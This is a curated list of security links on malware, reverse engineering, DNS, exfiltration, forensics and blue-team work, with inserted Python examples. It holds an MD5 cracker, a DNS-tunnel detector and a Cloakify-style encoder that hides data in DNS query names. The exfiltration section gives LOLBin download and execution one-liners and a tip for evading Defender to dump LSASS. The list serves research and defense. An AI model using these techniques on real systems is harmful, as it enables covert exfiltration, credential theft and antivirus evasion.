- The Return of the Malwarebytes Crackme: Writeup and scripts for the 2021 malwarebytes crackme. [Malwarebytes CrackMe 3 2021 Solution](https://rainbowpigeon.me/posts/malwarebytes-crackme-3-2021/)
- Corvus
- MalAPI.io
- Malicious Document Analysis: Example 1
- APIVADS - Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
- Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth
- A new secret stash for “fileless” malware
- A collection of tools for working with TrickBot
- imaginaryC2 - replays captured Command-and-Control responses/served payloads for behavioral malware analysis.
- A collection of x64dbg scripts
-
Malware Samples
- Architecture of a ransomware
- Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
- Mac Malware
- Detricking TrickBot Loader - TrickBot is a successor of the banking stealer called Dyre. It is still believed that those two families might've been developed by the same actor. [decoder](https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-07-29-trickbot-decoded-first-loader-template.vk.raw), [tweet](https://twitter.com/VK_Intel/status/1155923795674316801)
- Analysis of Emotet v4
- abuse.ch Feodo Tracker Botnet C2 IP Blocklist
- Mirai "Batkek"
- FinFisher Filleted 🐟
- Ryuk’s Return
- Ryuk Ransomware
- Collaboration between FIN7 and the RYUK group, a Truesec Investigation
- After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
- #Buer #BuerLoader
- SoReL-20M - ReversingLabs 20 million sample dataset.
- Purple Fox Rootkit Now Propagates as a Worm
- How to analyze mobile malware: a Cabassous/FluBot Case study
- Malware Analysis of a Password Stealer
- Guildma
- Darkside RaaS in Linux version
-
Malware Articles and Sources
- “VANILLA” malware
- A Mix of Python & VBA in a Malicious Word Document
- MalwareAnalysisForHedgehogs
- EMOTET
- A MIPS-32 ELF non-resident virus with false disassembly
- Linux.Kropotkine.asm
- A WILD KOBALOS APPEARS - [IoCs](https://github.com/eset/malware-ioc/tree/master/kobalos)
- List of victim organizations attacked by Ransomware gangs released on the DarkWeb
- 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
-
Web Malwares
- Boa release
- New evasion techniques found in web skimmers
- digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process - [anywhere](https://gist.github.com/krautface/e9fece3a3271bc19bd198a72fa8f363e), [stega-loader](https://gist.github.com/krautface/47144708de5ebf78713db10bb486ea87), [paypal-cors-deob-good.js](https://gist.github.com/krautface/dee181bec40b8e99e21fc932d9922df2), [paypal-cors-deob-with-comments.js](https://gist.github.com/krautface/933b050eb363e20cf1bc925c87a9290f), [fake-paypal.html](https://gist.github.com/krautface/243aabc63f6f7424ff75e8e9cbd35016)
-
Repos
- malware.one
- Beginner Malware Reversing Challenges - Reversing-Challenges)
- MalwareWorld
- MalwareBazaar
- What is MWDB Core? - core](https://github.com/CERT-Polska/mwdb-core): Malware repository component for samples & static configuration with REST API interface.
- Malpedia
-
Ransomwares
- Player 3 Has Entered the Game: Say Hello to 'WannaCry'
- WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
- Ransomware Overview
- Analyzing GrandSoft Exploit Kit
- Tracking REvil
- Sodinokibi (aka REvil) Ransomware
- REvil Master Key for Kaseya Attack Posted to XSS
- After the ransom was paid, the attackers even provided some bonus security advice!
- Sophisticated new Android malware marks the latest evolution of mobile ransomware
- Genetic Analysis of CryptoWall Ransomware
- Brazilian Justice Court Ransomware: Another piece in the Puzzle
- A Ransomware has landed! @Embraer
- RANSOMWARE GUIDANCE AND RESOURCES
- No More Ransom!
- PYSA/Mespinoza Ransomware
- PYSA Ransomware
- Mespinoza Analysis — New ransomware variant targets France
- Some #PYSA / #Mespinoza #Ransomware Samples
- Cerber Ransomware
- RansomEXX Trojan attacks Linux systems
- FIN7 - Lizar client Interface version 2.0.4
- Introducing COLT – Compromise to Leak Time
- RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL
- Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language
- Apostle Ransomware Analysis
- From Wiper to Ransomware | The Evolution of Agrius
- Hades Ransomware Operators Use Distinctive Tactics and Infrastructure
- BlackMatter x64 Linux Variant | esxcli variant - [esxcli function](https://github.com/k-vitali/Malware-Misc-RE/blob/master/2021-08-05-blackmatter-ransom-linux-esxcli-func-vk.raww)
- Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea
- RansomExx Renner
- RANSOMWHERE
- Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus - an anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.
- Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
- Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
- Schroedinger’s Pet(ya)
-
Virus/Anti-Virus
- Avast open-sources its machine-code decompiler
- make a process unkillable?!
- Attack inception
- Curtis' Blog: Bypassing Next Gen AV During a Pentest
- BinariesThatDoesOtherStuff
- The ELF Virus Writing HOWTO
- Virus Total API in Python
- Antivirus Event Analysis Cheat Sheet v1.7.2
- UglyEXe
- Engineering antivirus evasion
- An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
- Inception - in-memory compilation and reflective loading of C# apps for AV evasion.
-
Trojans/Loggers
-
-
Links
-
- The 4th in the 5th: Temporal Aspects of Cyber Operations
- FIRST
- Malware Analysis Resources
- Cert.BR - useful [links](https://www.cert.br/links/)
- 7º Fórum Brasileiro de CSIRTs (7th Brazilian CSIRTs Forum)
- 9º Fórum Brasileiro de CSIRTs (9th Brazilian CSIRTs Forum)
- list
- Encoding vs. Encryption vs. Hashing vs. Obfuscation
- Shodan - search engine for Internet-connected devices. [Shodan 2000](https://2000.shodan.io/)
- CriminalIP - provides security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
- SPLOITUS
- Vulmon
- CIS SecureSuite® Membership
- CRYPTO101
- CPDoS
- Open CSIRT Foundation - [SIM v3 Model](http://opencsirt.org/wp-content/uploads/2019/12/SIM3-mkXVIIIc.pdf) and [SIM3 Self Assessment](https://sim3-check.opencsirt.org).
- Global Forum on Cyber Expertise (GFCE)
- Ten strategies of a world-class cybersecurity operations center
- Institute for Security and Technology - its non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions.
- NIST'S CYBERSECURITY FRAMEWORK
- Illustrated X.509 Certificate
- DWF
- OpenEX - [repo](https://github.com/OpenEx-Platform/openex)
- NCSI
- THE EVOLUTION OF TRUST
- list
- hacking-tutorials
- crypto
- tink - multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
- SMHasher - test suite for non-cryptographic hash functions. [another repo](https://github.com/aappleby/smhasher)
- cacao - [OASIS CACAO TC](https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cacao)
- cti-documentation
- SOCless - [repo](https://github.com/twilio-labs/socless)
- my-infosec-awesome
- How to Secure Anything
- Metasploitable3
- pluto-eris - half-pairing cycle of elliptic curves.
- cset
- comply
- Open Security Controls Assessment Language (OSCAL) - XML-, JSON-, and YAML-based formats that provide standardized representations of information pertaining to the publication, implementation, and assessment of security controls.
- OASIS Common Security Advisory Framework (CSAF) - [oasis-tcs/csaf](https://github.com/oasis-tcs/csaf), [secvisogram](https://github.com/secvisogram/secvisogram), [editor](https://secvisogram.github.io/)
- notrandom
- APT & CyberCriminal Campaign Collection
-
Incident Response
- Applying DevOps Principles in Incident Response
- Pagerduty Incident Response
- Request Tracker
- CSIRT Schiltron: Training, Techniques, and Talent
- Practical Tabletop Drills for CSIRTS - Pre-session Material
- Critical Log Review Checklist for Security Incidents
- Exercise in a Box
- Incident response overview
- How to Write and Execute Great Incident Response Playbooks
- Incident Response: Windows Cheatsheet
- Incident Response: Windows Account Logon and logon Events
- Incident Response: Windows Account Management Event (Part 2)
- Incident Response- Linux Cheatsheet
- Building Better CSIRTs Using Behavioral Psychology (Black Hat USA 2021 briefing)
- The features all Incident Response Plans need to have
- security-training
- incident-response-docs
- global-irt
- atc-react
- Beagle
- DFIRTrack
- FIR
- Aurora Incident Response
- timesketch
- FastIR Collector Linux
- Maltrail
-
Hashing
- MD5 Decryption - online lookup of precomputed MD5 hashes; a hash is not decrypted, it is matched against a dictionary of candidates that were hashed in advance.
- SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
- Sha256 Algorithm Explained
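The point behind the "MD5 Decryption" entry above is worth seeing in code: a hash is a one-way function, so the only way to get a password back from its digest is to guess candidates, hash them with the same algorithm (and salt, if any) and compare. The block below is an added example written for this page, not code from any of the linked sites; the wordlist and the `s4lt` salt are constructed for the demo.

```python
import hashlib
import itertools
import string

# Constructed demo wordlist; not taken from any real breach or the linked sites.
WORDLIST = ["password", "letmein", "hunter2", "Summer2021", "qwerty"]


def hexdigest(algo: str, text: str) -> str:
    """Hash text with a hashlib algorithm name ("md5", "sha1", "sha256", ...)."""
    return hashlib.new(algo, text.encode()).hexdigest()


def crack_dictionary(target_hex: str, algo: str = "md5", salt: str = "",
                     wordlist=WORDLIST):
    """Dictionary attack: hash each candidate (salt + word) and compare.

    This is what an online "MD5 decryption" site actually does, with a much
    larger precomputed table. Returns the matching word or None.
    """
    target_hex = target_hex.lower()
    for word in wordlist:
        if hexdigest(algo, salt + word) == target_hex:
            return word
    return None


def crack_bruteforce(target_hex: str, algo: str = "md5",
                     alphabet: str = string.ascii_lowercase, max_len: int = 3):
    """Exhaustive search over short strings; cost grows as len(alphabet)**n."""
    target_hex = target_hex.lower()
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            candidate = "".join(chars)
            if hexdigest(algo, candidate) == target_hex:
                return candidate
    return None


if __name__ == "__main__":
    digest = hexdigest("md5", "hunter2")
    print(crack_dictionary(digest))                   # hunter2
    print(crack_dictionary(hexdigest("md5", "s4lthunter2")))  # None: unsalted table misses it
    print(crack_dictionary(hexdigest("md5", "s4lthunter2"), salt="s4lt"))  # hunter2
```

The salt does not make the hash stronger; it only stops a single precomputed table (or a public lookup site) from serving every victim at once, which is why the salted digest misses until the attacker knows the salt.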
-
-
Reverse Engineering
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- Fundamentos de Engenharia Reversa (Reverse Engineering Fundamentals)
- Dangers of the Decompiler
- RE guide for beginners: Methodology and tools
- Reversing ARM Binaries
- Reverse Engineering for Beginners
- rattle
- Reversing a Japanese Wireless SD Card From Zero to Code Execution
- Reverse engineering Go binaries using Radare 2 and Python
- IDAPro Cheat Sheet
- TLS callbacks
- rename gamemaker handlers
- Generic Anomalies - executable file
- Controlling GDB
- Low Level Visualization via Debuggers
- Faster GDB Startup
- Getting Started with Frida Tools
- Immunity Debugger
- mona
- LIEF - [lief-project/LIEF](https://github.com/lief-project/LIEF/)
- DEBIN
- Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
- Manticore
- Beam me up, CFG. - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
- Linux Reverse Engineering CTFs for Beginners
- Reverse Engineering of a Not-so-Secure IoT Device
- Python for Reverse Engineering 1
- The 101 of ELF files on Linux - Linux Audit
- On ELF, Part 1
- On ELF, Part 2
- Kaitai Struct
- Reverse Engineering 'A Link to the Past (GBA)' ep 1
- wiggle
- Reverse-engineering precision op amps from a 1969 analog computer
- Qiling Framework
- Tales Of Binary Deobfuscation - Part 1
- Deobfuscating DanaBot’s API Hashing
- Deobfuscation: recovering an OLLVM-protected program
- VX Underground
- How to automatically attach a process to a debugger.
- Taming Virtual Machine Based Code Protection
- playing with little endian
- flare-floss - Automatically extract obfuscated strings from malware.
- #BazarBackdoor Group #CobaltStrike Payload
- The Debugging Book
- Debugging System with DCI and Windbg - [SMM LPE exploit & demo](https://twitter.com/standa_t/status/1376525000002334725), [SmmExploit](https://github.com/tandasat/SmmExploit).
- SCAS/SCASB/SCASW/SCASD
- Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
- Reverse engineering (Absolute) UEFI modules for beginners
- Reverse Engineering the M6 Smart Fitness Bracelet
- Reverse Engineering a Linux executable – hello world
- OpenSecurityTraining2 - a 501(c)(3) non-profit working to create the world's best cybersecurity training.
- Nightmare
- Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how
- Reverse Engineering PsExec for fun and knowledge
- Reverse Engineering TikTok's VM Obfuscation
- Frida hooking Android: part 1, [part 2](https://11x256.github.io/Frida-hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
- BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
- CPU Adventure – Unknown CPU Reversing - we reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
- Practical-Reverse-Engineering-using-Radare2
- some things about gef
- Finding memory bugs with AddressSanitizer
-
Decompilers
- decompile_java - another java decompiler.
- edb - cross-platform AArch32/x86/x86-64 debugger.
-
Yara
- mkYARA - [fox-it/mkyara](https://github.com/fox-it/mkyara)
- xored_pefile_mini
- ThreatHunting
-
Ghidra
- ghidra
- Decompiler Analysis Engine - performs data-flow analysis on software, starting from the binary executable.
- Working With Ghidra's P-Code To Identify Vulnerable Function Calls
- GhIDA - [Cisco-Talos/GhIDA](https://github.com/Cisco-Talos/GhIDA).
- SVD-Loader for Ghidra - bare-metal ARM reverse engineering. [repo](https://github.com/leveldown-security/SVD-Loader-Ghidra)
- Introduction to Reverse Engineering with Ghidra: A Four Session Course
- Ghidra Plugin Development for Vulnerability Research - Part-1
- Defeating Code Obfuscation with Angr
- ghidra2frida
- Reversing Raw Binary Firmware Files in Ghidra
- IDA Graph view with outlined function included
- G-3PO: A Protocol Droid for Ghidra
- Reverse Engineering Go Binaries with Ghidra
-
-
DNS
- Unbound DNS Blacklist
- Plight At The End Of The Tunnel
- subzy
- Subdomain Takeover Scanner
- subdomain-takeover
- DNSCrypt - [dnscrypt-proxy 2](https://github.com/DNSCrypt/dnscrypt-proxy), [resolvers](https://github.com/DNSCrypt/dnscrypt-resolvers) and [docker image](https://github.com/DNSCrypt/dnscrypt-server-docker).
- pdns-qof
- dnsdbq
- How to enable bind query logging to find out Who’s Querying a Name Server
- BIND Logging - some basic recommendations
- BIND 9 logging best practices
- BIND9 Configuration Guide
- Thwarting and detecting malware with RPZ and OSSEC
- The Importance of DNS Logging in Enterprise Security
- DNSObserver - catches out-of-band DNS interactions and sends lookup notifications via Slack. [Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor](https://www.allysonomalley.com/2020/05/22/dnsobserver/)
- dns-rebind-toolkit - front-end JavaScript toolkit for creating DNS rebinding attacks.
- SubR3con
- TakeOver-v1
- sad dns - allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- NtHiM - Super Fast Sub-domain Takeover Detection!
- Passive DNS - Common Output Format
- DNS loophole makes nation-state level spying as easy as registering a domain - [checker](https://dns-checker.tools.wiz.io/)
- dref
- Can I take over XYZ?
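Several entries above (the BIND query-logging guides, "The Importance of DNS Logging in Enterprise Security", "Plight At The End Of The Tunnel") make the same case: once resolver queries are logged, tunnels and exfiltration stand out by shape rather than by destination. The block below is an added example for this page, not code from any of the linked tools or posts. It parses log lines in the shape BIND 9 writes to its `queries` channel and flags registered domains that receive many unique, long, high-entropy subdomain lookups. The log lines are constructed for the demo, and `registered_domain` deliberately uses the last two labels instead of the Public Suffix List, which is an assumption that real code should replace.

```python
import hashlib
import math
import re
from collections import defaultdict

# BIND 9 "queries" channel, roughly:
#   <date> queries: info: client @0x... 10.0.0.5#51234 (www.example.com): query: www.example.com IN A + (10.0.0.53)
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<src>[\d.]+)#\d+ .*?query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def shannon_entropy(s: str) -> float:
    """Bits per character; near 4.0 for random hex, well under 3 for dictionary labels."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_query_log(lines):
    """Yield (source_ip, qname, qtype) for each query line; skip everything else."""
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            yield m["src"], m["qname"].rstrip(".").lower(), m["qtype"].upper()


def registered_domain(qname: str) -> str:
    # Assumption for the demo: last two labels. Use the Public Suffix List in production.
    labels = qname.split(".")
    return ".".join(labels[-2:])


def find_tunnels(lines, min_unique=20, min_label=30, min_entropy=3.0):
    """Flag registered domains whose query pattern looks like a DNS tunnel."""
    stats = defaultdict(lambda: {"n": 0, "names": set(), "longest": 0, "ent": 0.0})
    for _src, qname, _qtype in parse_query_log(lines):
        st = stats[registered_domain(qname)]
        first = qname.split(".")[0]           # the label a tunnel client fills with data
        st["n"] += 1
        st["names"].add(qname)
        st["longest"] = max(st["longest"], len(first))
        st["ent"] += shannon_entropy(first)
    flagged = []
    for dom, st in stats.items():
        if (len(st["names"]) >= min_unique
                and st["longest"] >= min_label
                and st["ent"] / st["n"] >= min_entropy):
            flagged.append(dom)
    return sorted(flagged)


def _line(src, qname, qtype):
    return (f"09-Mar-2021 12:00:01.000 queries: info: client @0x7f0c4c0a8e60 {src}#51234 "
            f"({qname}): query: {qname} IN {qtype} + (10.0.0.53)")


# Constructed sample: ordinary browsing plus 40 TXT lookups carrying 40-hex-char labels.
SAMPLE_LOG = [_line("10.0.0.5", n, "A")
              for n in ("www.example.com", "mail.example.com", "cdn.example.com")] * 10
SAMPLE_LOG += [_line("10.0.0.7", hashlib.sha256(str(i).encode()).hexdigest()[:40]
                     + ".t.exfil-demo.net", "TXT") for i in range(40)]

if __name__ == "__main__":
    print(find_tunnels(SAMPLE_LOG))  # ['exfil-demo.net']
```

The thresholds are starting points, not a detection rule: CDNs and anti-virus vendors also generate many unique, hash-looking labels under one domain, so in practice the flagged list is fed into an allowlist and then reviewed per source host. Tunnels that encode data as dictionary words (see the Exfiltration section) defeat the entropy test and are left only with the unique-name count.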
-
-
Exfiltration
- Windows TCPIP Finger Command
- Script for searching the extracted firmware file system for goodies!
- Twitter Scraper
- Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
- whois | GTFOBins
- PacketWhisper - Text-Based Steganography. [PacketWhisper](https://github.com/TryCatchHCF/PacketWhisper): Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
- Exfiltrating credentials via PAM backdoors & DNS requests
- Building simple DNS endpoints for exfiltration or C&C
- CheckPlease
- okhttp-peer-certificate-extractor
- awesome-python-login-model
- DKMC - Dont kill my cat
- Tunna
- gitleaks
- tinfoleak - open-source tool for Twitter intelligence analysis
- Social IDs
- accountanalysis
- How to get authentication key from SNMPv3 packets
- AtomicTestsCommandLines.txt - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
- ssh-keygen can be used to load shared libraries
- Browsers affected by the History API DoS
- Using Google Analytics for data extraction
- Hamburglar
- Living Off The Land Binaries and Scripts (and also Libraries) - [github](https://github.com/LOLBAS-Project/LOLBAS)
- Living Off Windows Land – A New Native File “downldr”
- Ttdinject.exe
- Exfiltrate Like a Pro
- Cloakify-Factory - Text-Based Steganography. [Cloakify](https://github.com/TryCatchHCF/Cloakify): Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
- Chameleon
- DNSExfiltrator
- Data Exfiltration using Linux Binaries
- Exploring the WDAC Microsoft Recommended Block Rules: kill.exe
- Desperate downloader
- I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source=<url>
- C:\Windows\System32\Cmdl32.exe
- I shot the sigverif.exe – the GUI-based LOLBin
- \\http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe
- Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus?
- C:\Windows\System32\WorkFolders.exe
- C:\Windows\System32\certoc.exe -LoadDLL <DLLName>
- Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service
- Living off the land
- if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
- It's not a forgotten legacy code, it's recidivism
- Python Keylogger Using Mailtrap.io
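The Cloakify and PacketWhisper entries above describe the same two-step idea: turn any file into a list of innocuous strings (one string per base64 symbol), then carry those strings somewhere a DLP rule will not object to, such as the labels of DNS queries that any resolver on the path will forward and log. The block below is an added example for this page, written to show the mechanism; it is not the Cloakify or PacketWhisper code, its 64-word cipher is made up, and the `cdn-metrics.example` domain and sequence-number label layout are assumptions of the demo rather than either tool's wire format.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# Constructed 64-word "cipher": one everyday word per base64 symbol. The real
# Cloakify ciphers are larger and more varied (IP addresses, emoji, sports
# scores); these words are made up for the example.
CIPHER = """apple banana cherry date elder fig grape honey iris jasmine kiwi lemon
mango nectar olive peach quince rose sage thyme umber violet walnut xenia yarrow
zinnia amber bronze copper denim ebony flax garnet hazel indigo jade khaki lilac
maroon navy ochre pearl quartz ruby sienna teal ultramarine vermilion wheat
yellow azure beige coral dusk ember frost glacier harbor island juniper kestrel
lantern meadow north""".split()
assert len(CIPHER) == 64 and len(set(CIPHER)) == 64
WORD_TO_SYMBOL = {w: B64_ALPHABET[i] for i, w in enumerate(CIPHER)}


def cloak(data: bytes) -> list:
    """Base64 the payload, then replace each symbol with its cipher word."""
    symbols = base64.b64encode(data).decode().rstrip("=")
    return [CIPHER[B64_ALPHABET.index(c)] for c in symbols]


def decloak(words) -> bytes:
    """Inverse of cloak(); tolerates the missing base64 padding."""
    symbols = "".join(WORD_TO_SYMBOL[w] for w in words)
    return base64.b64decode(symbols + "=" * (-len(symbols) % 4))


def to_dns_queries(words, domain: str) -> list:
    """One query name per word, with a sequence label so the receiver can reorder.

    Assumed layout for the demo: <seq>.<word>.<domain>. Nothing needs to answer
    these queries; the receiver only needs to see them (pcap, resolver log).
    """
    return [f"{i}.{w}.{domain}" for i, w in enumerate(words)]


def from_dns_queries(qnames, domain: str) -> bytes:
    """Rebuild the payload from observed query names, in any order, ignoring noise."""
    suffix = "." + domain
    seq = {}
    for name in qnames:
        if not name.endswith(suffix):
            continue
        idx, word = name[: -len(suffix)].split(".", 1)
        seq[int(idx)] = word
    return decloak(seq[i] for i in sorted(seq))


if __name__ == "__main__":
    words = cloak(b"exfil me: secret=42\n")
    queries = to_dns_queries(words, "cdn-metrics.example")
    print(queries[:3])
    print(from_dns_queries(queries, "cdn-metrics.example"))
```

For the defender the interesting property is what this removes and what it leaves: the labels are dictionary words, so the entropy and label-length heuristics that catch hex-encoded tunnels see nothing, but the volume of distinct names under one registered domain and the sequence counter are still there in the query log.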
-
Steganography
- How To Hide Data in Images Using Python
- A list of useful tools and resources
- stegsolve
- Unicode Text Steganography Encoders/Decoders
- Simple Image Steganography in Python
- Aperi'Solve
- Stegseek
-
-
Forensics
-
Steganography
- Tsurugi Linux
- libelfmaster
- usbrip
- Digital Forensics and Incident Response
- Linux Incident Response Guide
- Cloud Forensics Triage Framework (CFTF)
- Forensic Investigation
- Invoke-LiveResponse
- Linux Forensics
- mac_apt
- imago-forensics
- remedi-infrastructure
- Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
- O-Saft
- KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. [blog post](https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape). [KAPE docs](https://ericzimmerman.github.io/KapeDocs/) and [KAPE Files](https://github.com/EricZimmerman/KapeFiles)
- file Signatures
- OfficeForensicTools
- FBI Electronic Tip For
- CHIRP
- Hash Cracking with AWS and hashcat
- Hashcat new feature: autodetect hash-mode
- L0phtCrack - force, hybrid attacks, and rainbow tables. [gitlab repo](https://gitlab.com/l0phtcrack/l0phtcrack)
- TrID
- image-unshredding
- Eric Zimmerman's Tools
- MacQuisition - in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
- FastIR Artifacts
- exif-gps-tracer
- ShredOS x86_64 - Disk Eraser - Secure disk erasure/wipe.
- dfir_ntfs
- LeechCore
-
PDF
- PDF Tools
- How to Protect Files With Canary Tokens
- Attacks on PDF Certification
- How to remove malicious code from PDF files
- mu tools
- PDF forensics with Kali Linux : pdfid and pdfparser
- How can I extract a JavaScript from a PDF file with a command line tool?
- Shadow Attacks … the smallest attack vector ever
- Insecure Features in PDFs. - in-security.blogspot.com/2021/01/insecure-features-in-pdfs.html)
-
Email Headers
-
Distros
-
Volatility
- Volatility profiles for Linux and Mac OS X
- Building a profile for Volatility
- OROCHI
- AutoVolatility
- Volatility, my own cheatsheet (Part 1): Image Identification
- First steps to volatile memory analysis
- Memory Forensics and Analysis Using Volatility
-
-
Mobile
-
Android
- mvt
- android-security-awesome
- A Story About Three Bluetooth Vulnerabilities in Android
- Creating an Android Open Source Research Device on Your PC
- Project Zero
- I'm looking at a Huawei P20 from China, let see what can I found
- Tracking down the developer of Android adware affecting millions of users
- Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
- Exploiting Android Messengers with WebRTC: Part 3
- Security Guidelines
- Proxying Android app traffic – Common issues / checklist
- Oscorp evolves into UBEL: an advanced Android malware spreading across the globe
- Android Application Penetration Testing Checklist
- 50 secrets codes on Android
- tip toeing past android 7’s network security configuration
-
AWS
- Prowler
- AWS IAM privileges as found using the AWS Policy Generator described at
- Endgame
- Text → AWS IAM Policy - 3 from Open AI to generate an AWS IAM policy.
-
macOS/iOS
-
Linux/ *Nix
- Ground Zero: Reverse Engineering
- Password Protected Reverse Shells – Linux x64
- Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
- Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
- Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
- Dmesg under the hood
- Randomize your MAC address using NetworkManager
- Shadow-Box - [presentation](https://github.com/kkamagui/papers/blob/master/bevx-2018/presentation.pdf) and [other papers](https://github.com/kkamagui/papers)
- Privilege Escalation
- A cache invalidation bug in Linux memory management
- Announcing flickerfree boot for Fedora 29
- The Linux Backdoor Attempt of 2003
- GMER
- A look at home routers, and a surprising bug in Linux/MIPS
- Hacking Tricks
- Basic Linux Privilege Escalation
- Linux process infection (part I)
- tpotce - Pot Universal Installer and ISO Creator.
- Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials
- A gentle introduction to Linux Kernel fuzzing - [code](https://github.com/cloudflare/cloudflare-blog/tree/master/2019-07-kernel-fuzzing)
- Teardown of a Failed Linux LTS Spectre Fix - inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
- Ken Thompson's Unix password
- Exploiting Wi-Fi Stack on Tesla Model S
- (Ab)using Kerberos from Linux
- Privilege Escalation via Python Library Hijacking
- Logging Passwords on Linux
- Kicksecure ™ - hardened, Non-anonymous Linux Distribution
- Setuid Demystified
- Producing a trustworthy x86-based Linux appliance
- Running a quick NMAP scan to inventory my network
- 64-bit Linux stack smashing tutorial: Part 1
- Hardening ELF binaries using Relocation Read-Only (RELRO)
- Linux Threat Report 2021 1H
- Learning Linux Kernel Exploitation - Part 1 - linux-kernel-pwn-part-2/)
- Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
- So You Wanna Pwn The Kernel?
- Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh
- Binary analysis on Linux
- SMB “Access is denied” caused by anti-NTLM relay protection
-
Cloud
- Cloud Security Alliance
- CIS Controls Cloud Companion Guide
- Uncovering bad guys hiding behind CloudFlare
- Malicious Shell Script Steals Cloud Credentials
- A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next
- Cloud Native Computing Foundation
- GitHub Action Runners
- 10 real-world stories of how we’ve compromised CI/CD pipelines
-
GCP/Google
- New research: How effective is basic account hygiene at preventing hijacking - security/five-things-you-can-do-right-now-to-stay-safer-online/)
-
Azure
- Preventing Exposed Azure Blob Storage
- Open Azure blobs search on grayhatwarfare.com and other updates
- ChaosDB - Cosmos DB.
- Introducing Project Freta - us/security/research/project-freta/)
- Finding Azurescape - Account Container Takeover in Azure Container Instances
- Malicious KQL Query
-
-
Blue Team
-
Volatility
- Blue Team Fundamentals
- Blue Team fundamentals Part Two
- EU MITRE ATT&CK® Community
- Mitre Att&ck Matrix
- ATTACK-Tools
- Analyzing threats with Mitre ATT&CK Navigator
- Atomic Threat Coverage
- Welcome to Stealthbits Attack Catalog
- attack-scripts
- Windows-specific MITRE ATT&CK techniques application control prevention assessment. - signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications.
- Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
- MITRE D3FEND
- Profile Sysmon logs to discover which LOLBAS binaries have run and what their command line arguments were
- Sooty - in-one CLI tool to automate and speed up workflow.
- Your detections aren't working
- Technical Approaches to Uncovering and Remediating Malicious Activity - 245A).
- Windows Advanced Audit Policy Map to Event IDs
- takuan
